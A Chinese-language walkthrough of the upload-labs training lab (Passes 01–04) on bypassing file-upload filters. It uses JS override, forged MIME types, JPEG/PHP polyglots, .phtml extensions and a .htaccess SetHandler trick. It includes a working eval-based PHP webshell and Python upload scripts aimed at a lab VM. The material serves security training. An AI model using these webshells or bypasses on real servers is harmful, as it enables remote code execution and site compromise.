upload-labs
01 前端js繞過
ctrl+u查看源碼
// Client-side extension check wired to the upload form of Pass-01.
// SECURITY NOTE: this runs in the *uploader's* browser, so it is advisory only -
// it can be redefined from the DevTools console, disabled, or skipped entirely by
// sending the multipart request through a proxy. The server must validate again.
function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("請選擇要上傳的文件!");
        return false;
    }
    // Allow-list of extensions, kept as one '|'-separated string
    var allow_ext = ".jpg|.png|.gif";
    // Extract the extension: everything from the last '.' to the end of the name
    var ext_name = file.substring(file.lastIndexOf("."));
    // Reject when the extension is not in the allow-list.
    // NOTE: indexOf() is a substring search, not a list lookup - ".jp" or ".gi"
    // also pass because they occur inside ".jpg|.png|.gif".
    if (allow_ext.indexOf(ext_name) == -1) {
        var errMsg = "該文件不允許上傳,請上傳" + allow_ext + "類型的文件,當前文件類型爲:" + ext_name;
        alert(errMsg);
        return false;
    }
    // Implicit return (undefined) on success: only an explicit `false` blocks the submit.
}
將 `var allow_ext = ".jpg|.png|.gif";` 改爲 `var allow_ext = ".jpg|.png|.gif|.php";`，用 Chrome 瀏覽器按 F12 打開 DevTools，在 Console 裏黏貼修改後的整個 checkFile 函數定義並執行（執行的是這段定義本身：它會覆寫頁面上的全域 checkFile，之後表單提交呼叫到的就是放行 .php 的新版本），再正常選擇 test.php 上傳即可。由於這一關的檢查只發生在瀏覽器端，也可以直接停用 JavaScript，或先以 test.jpg 通過前端檢查、再在 Burp 等攔截代理中把請求裏的 filename 改回 test.php。
<!-- test.php -->
<?php
// One-line webshell used as the upload payload: whatever arrives in POST
// parameter `cmd` is executed as PHP. `@` silences PHP warnings so failures
// do not show up in the page. POST (rather than GET) keeps the command out of
// the web server's access log. Lab/CTF use only - never deploy.
@eval($_POST['cmd']);
?>
02 MIME繞過(1)
服務端 MIME 類型檢測，也就是檢測上傳請求中檔案部分的 Content-Type 標頭（在 PHP 裏對應 $_FILES['upload_file']['type']）。這個值完全由客戶端在 multipart 主體裏自行填寫，伺服器並未根據檔案內容二次驗證，所以只要改寫請求即可偽造。常見的值例如：
Content-Type: application/octet-stream
Content-Type: image/jpeg
抓取正常的圖片流量,與源碼對比
抓包
Content-Disposition: form-data; name="upload_file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Disposition: form-data; name="submit"
ctrl+u:源碼
<input class="input_file" type="file" name="upload_file"/>
<input class="button" type="submit" name="submit" value="上傳"/>
python3 的 requests.post 中 files 參數寫法如下（三元組為 (遠端檔名, 檔案物件, Content-Type)，第三個元素就是伺服器實際檢查的 MIME）：
# Shape of the `files` argument: each value is (remote filename, file object, Content-Type).
# The third element is the only thing Pass-02 inspects, and it is chosen by us.
files = {
"upload_file" : ("test33.jpg", open(lfile, "rb"), "image/png"),
"submit": (None, lfile)
}
# "test33.jpg" is the filename sent to (and stored by) the server, lfile is the local path.
# For the plain `submit` field (no filename="..." in the real request) pass None as the name.
繞過代碼:
#coding:utf-8
import requests
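def upload_img(lfile, url, *, remote_name="test33.php", mime="image/png"):
    """Upload *lfile* to the Pass-02 handler with a forged MIME type.

    Pass-02 only looks at the Content-Type of the file part, which is whatever
    the client writes into the multipart body, so a ``.php`` file labelled
    ``image/png`` is accepted and stored under *remote_name*.

    Args:
        lfile: local path of the file to send (the PHP payload).
        url: full URL of the upload handler (``.../Pass-02/index.php``).
        remote_name: filename written into the multipart part; this is the name
            the server stores, so it must keep the ``.php`` suffix.
        mime: Content-Type written into the file part.

    Returns:
        The ``requests.Response`` when the request went through, ``None`` when
        the file could not be read or the request failed (the error is printed).
        The response body is printed because the lab reports both success and
        rejection in the page, not in the status code.
    """
    try:
        # `with` closes the handle even if the POST raises; the original leaked it.
        with open(lfile, "rb") as fh:
            files = {
                "upload_file": (remote_name, fh, mime),
                # Plain form field (None = no filename). The original sent the local
                # path as its value and the lab accepted it, so the value is not checked.
                "submit": (None, lfile),
            }
            req = requests.post(url, files=files)
    except (OSError, requests.RequestException) as e:
        print(str(e))
        return None
    print(req.text)
    return req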
if __name__ == '__main__':
    # Local PHP payload -> Pass-02 endpoint on the lab VM (stored as a .php file).
    lfile, url = 'test.php', 'http://192.168.22.130/upload-labs-master/Pass-02/index.php'
    upload_img(lfile, url)
02 MIME繞過(2)
生成圖片木馬
cmd運行convert.bat
rem convert.bat
rem Glue a real JPEG and the PHP payload into one file, image bytes first so
rem magic-byte / getimagesize checks still see a JPEG.
rem /b = binary copy of test.jpg (whole file). /a = ASCII mode for test.php: per
rem copy's /a semantics the read stops at the first Ctrl-Z (0x1A) in it and a trailing
rem Ctrl-Z is appended to the output - harmless to PHP, but use /b on both operands
rem if the payload may contain 0x1A bytes.
copy test.jpg/b+test.php/a test2.jpg
pause
rem a => ascii
<!-- test.php -->
<?php
// Payload appended to the image: executes the PHP code passed in GET
// parameter `cmd` (see the phpinfo() example below). Unlike the POST variant,
// the command ends up in the query string and therefore in the access log.
// `@` suppresses warnings. Lab/CTF use only.
@eval($_GET['cmd']);
?>
激活 test2.jpg 裏包含的 PHP code 需要用 PHP 的 include 去引入它——伺服器不會把 .jpg 當成 PHP 執行，所以圖片木馬單獨上傳並不能直接執行，必須另有一個能放置的 PHP 檔（如下例 test2.php）或現成的檔案包含漏洞來觸發：
<?php
// Loader that makes the polyglot image execute: include() parses test2.jpg as
// PHP, so the <?php ... ?> chunk appended after the JPEG data runs.
// The missing ';' is legal here because '?>' implies a statement terminator.
// The path is resolved via include_path / the calling script's directory, so
// test2.php must sit next to the uploaded image (or an existing file-inclusion
// bug has to play this role).
include 'test2.jpg'
?>
執行
http://$uri/test2.php?cmd=phpinfo();
python 3
:
#coding:utf-8
import requests
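def convert2img(file_img, file_php, target):
    """Build a JPEG/PHP polyglot: the bytes of *file_img* followed by *file_php*.

    Same result as ``copy test.jpg/b+test.php/a test2.jpg`` minus the trailing
    Ctrl-Z that ``copy /a`` appends. The image comes first so magic-byte /
    getimagesize checks see a real JPEG; PHP's include() still executes the
    ``<?php ... ?>`` chunk wherever it sits in the file. The server does not run
    ``.jpg`` on its own - something has to include() the result (see test2.php).

    Args:
        file_img: path to the carrier image (read as bytes).
        file_php: path to the PHP payload (read as bytes).
        target: output path; overwritten if it exists.

    Returns:
        True on success, False when any file could not be read or written (the
        error is printed, matching the original script's reporting).
    """
    try:
        # `with` guarantees all three handles are closed even on error; the
        # original left them open when an exception fired before close().
        with open(target, "wb") as out:
            for part in (file_img, file_php):
                with open(part, "rb") as src:
                    out.write(src.read())
    except OSError as e:
        print('[-]: ' + str(e))
        return False
    return True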
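def upload_img(lfile, url, *, remote_name="test2.jpg", mime="image/png"):
    """POST the polyglot image *lfile* to the Pass-02 handler.

    The part is declared as ``image/png`` (the only thing Pass-02 checks) and
    stored under *remote_name*. Keeping the ``.jpg`` suffix means the server
    will not execute it; execution relies on a later include() (see test2.php).

    Args:
        lfile: local path of the file to upload.
        url: upload handler URL.
        remote_name: filename written into the multipart part (the stored name).
        mime: Content-Type written into the part.

    Returns:
        The ``requests.Response``, or ``None`` when the file could not be read
        or the request failed. NOTE: the lab renders rejections inside the HTML
        body, typically still with HTTP 200, so a 200 only proves the request
        was delivered - inspect ``.text`` or fetch the stored file before
        treating the upload as successful. The original printed "upload success"
        on any 200, which was misleading.
    """
    try:
        # `with` closes the handle even if the POST raises; the original leaked it.
        with open(lfile, "rb") as fh:
            files = {
                "upload_file": (remote_name, fh, mime),
                # Plain form field (None = no filename); the lab accepts any value here.
                "submit": (None, lfile),
            }
            req = requests.post(url, files=files)
    except (OSError, requests.RequestException) as e:
        print("[-]: upload failed")
        print(str(e))
        return None
    if req.status_code == 200:
        print("[+]: HTTP 200 - request delivered, check the response body for the verdict")
    else:
        print("[-]: HTTP " + str(req.status_code))
    return req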
if __name__ == '__main__':
    # Step 1: glue test.php onto test.jpg -> test2.jpg (JPEG bytes first so image checks pass).
    file_img, file_php, target = 'test.jpg', 'test.php', 'test2.jpg'
    convert2img(file_img, file_php, target)
    # Step 2: ship the polyglot to Pass-02 under its .jpg name.
    lfile = target
    url = 'http://192.168.22.130/upload-labs-master/Pass-02/index.php'
    upload_img(lfile, url)
03 mime.types
// Pass-03 source: strip the NTFS alternate-data-stream suffix before the blacklist check.
// Without this line a name like `shell.php::$DATA` would slip past a suffix blacklist
// (the extension being compared is e.g. `php::$data`) while Windows/NTFS still creates
// the file as `shell.php`, because `::$DATA` only names the default data stream.
// Since this pass does strip it, the ADS trick is neutralised here; it only works
// against passes that lack this line, and only when the lab runs on a Windows host.
$file_ext = str_ireplace('::$DATA', '', $file_ext);
這裏利用的其實不是 Apache 本身的「解析漏洞」，而是 PHP 模組的副檔名對應：Apache 把 application/x-httpd-php 這個 handler 綁到 phtml、pht、php 等多個副檔名（實際位置視發行版與 PHP SAPI 而定，例如 /etc/mime.types，或 mods-enabled/php*.conf 裏的 AddType / FilesMatch），而 Pass-03 的黑名單只擋了 .php：
application/x-httpd-php phtml pht php
因此上傳 .phtml（或 .pht，以及伺服器實際對應到該 handler 的任何其他副檔名）即可被當成 PHP 執行。
04 .htaccess
Apache配置:
/etc/apache2/apache2.conf
AllowOverride All
Apache 加載 mod_rewrite 模塊（這是 upload-labs 環境說明要求的設定；本關的 .htaccess 只用到 SetHandler，真正必要的是上面的 AllowOverride All（至少 FileInfo）讓 .htaccess 生效，mod_rewrite 本身不是此繞過的前提）：
cp /etc/apache2/mods-available/rewrite.load /etc/apache2/mods-enabled/rewrite.load
rewrite.load內容:
LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
systemctl restart apache2
httpd配置:
/etc/httpd/conf/httpd.conf
AllowOverride All
/etc/httpd/conf.modules.d/00-base.conf（注意：RHEL/CentOS 的 httpd 模組路徑通常是相對於 ServerRoot 的 `modules/mod_rewrite.so`；下一行的 /usr/lib/apache2/... 是 Debian 系的路徑，疑為複製貼上所致，請依實際系統調整）
LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
systemctl restart httpd.service
#coding:utf-8
import requests
import time
URL = 'http://192.168.22.130/000/upload-labs-master'
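def upload_img(lfile, url, *, remote_name="pass-04.jpg", mime="image/png"):
    """Upload the payload image to the Pass-04 handler.

    Pass-04 blacklists extensions, so the payload is sent as ``.jpg``; it is
    executed only because the ``.htaccess`` uploaded beforehand (``up_htaccess``)
    makes Apache hand every file in that directory to the PHP handler.

    Args:
        lfile: local path of the file to upload.
        url: upload handler URL.
        remote_name: filename written into the multipart part (the stored name).
        mime: Content-Type written into the part.

    Returns:
        The ``requests.Response``, or ``None`` when the file could not be read
        or the request failed. NOTE: the lab renders rejections inside the HTML
        body, typically still with HTTP 200, so a 200 only proves the request
        was delivered - check ``.text`` or request the stored file before
        treating the upload as successful. The original printed "upload success"
        on any 200, which was misleading.
    """
    try:
        # `with` closes the handle even if the POST raises; the original leaked it.
        with open(lfile, "rb") as fh:
            files = {
                "upload_file": (remote_name, fh, mime),
                # Plain form field (None = no filename); the lab accepts any value here.
                "submit": (None, lfile),
            }
            req = requests.post(url, files=files)
    except (OSError, requests.RequestException) as e:
        print("[-]: upload failed")
        print(str(e))
        return None
    if req.status_code == 200:
        print("[+]: HTTP 200 - request delivered, check the response body for the verdict")
    else:
        print("[-]: HTTP " + str(req.status_code))
    return req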
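def up_htaccess(lfile, url, *, remote_name=".htaccess", mime="text/plain"):
    """Upload a ``.htaccess`` file to the Pass-04 upload directory.

    ``.htaccess`` is not on the Pass-04 extension blacklist. Once it lands in
    the upload directory, its ``SetHandler application/x-httpd-php`` makes
    Apache run every file there as PHP, so a subsequently uploaded ``.jpg``
    payload executes. Requires ``AllowOverride`` permitting FileInfo and the
    PHP handler being available to ``.htaccess`` (mod_php style setups).

    Args:
        lfile: local path of the .htaccess content to send.
        url: upload handler URL.
        remote_name: filename written into the multipart part; must stay
            ``.htaccess`` for Apache to honour it.
        mime: Content-Type written into the part (not checked by Pass-04).

    Returns:
        The ``requests.Response``, or ``None`` when the file could not be read
        or the request failed. As with ``upload_img``, HTTP 200 does not by
        itself mean the lab accepted the file - check the body.
    """
    try:
        # `with` closes the handle even if the POST raises; the original leaked it.
        with open(lfile, "rb") as fh:
            files = {
                "upload_file": (remote_name, fh, mime),
                # Plain form field (None = no filename); the lab accepts any value here.
                "submit": (None, lfile),
            }
            req = requests.post(url, files=files)
    except (OSError, requests.RequestException) as e:
        print("[-]: upload failed")
        print(str(e))
        return None
    if req.status_code == 200:
        print("[+]: HTTP 200 - request delivered, check the response body for the verdict")
    else:
        print("[-]: HTTP " + str(req.status_code))
    return req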
if __name__ == '__main__':
    lfile_1, lfile_2 = 'pass-04.htaccess', 'pass-04.jpg'
    url = URL + '/Pass-04/index.php'
    # .htaccess goes first: it has to be in place before the .jpg is requested
    # so Apache already hands that directory to the PHP handler.
    up_htaccess(lfile_1, url)
    time.sleep(1)  # brief gap between the two requests, as in the original
    upload_img(lfile_2, url)
pass-04.htaccess 內容（把該目錄下的所有檔案——包括之前真正的圖片——都交給 PHP handler 處理；若只想針對單一檔案，可把這行包在 `<FilesMatch "pass-04.jpg">…</FilesMatch>` 裏。此法依賴 Apache 允許 .htaccess 覆寫 FileInfo，且以 mod_php 這類 handler 執行 PHP；php-fpm 環境的 handler 名稱不同）：
SetHandler application/x-httpd-php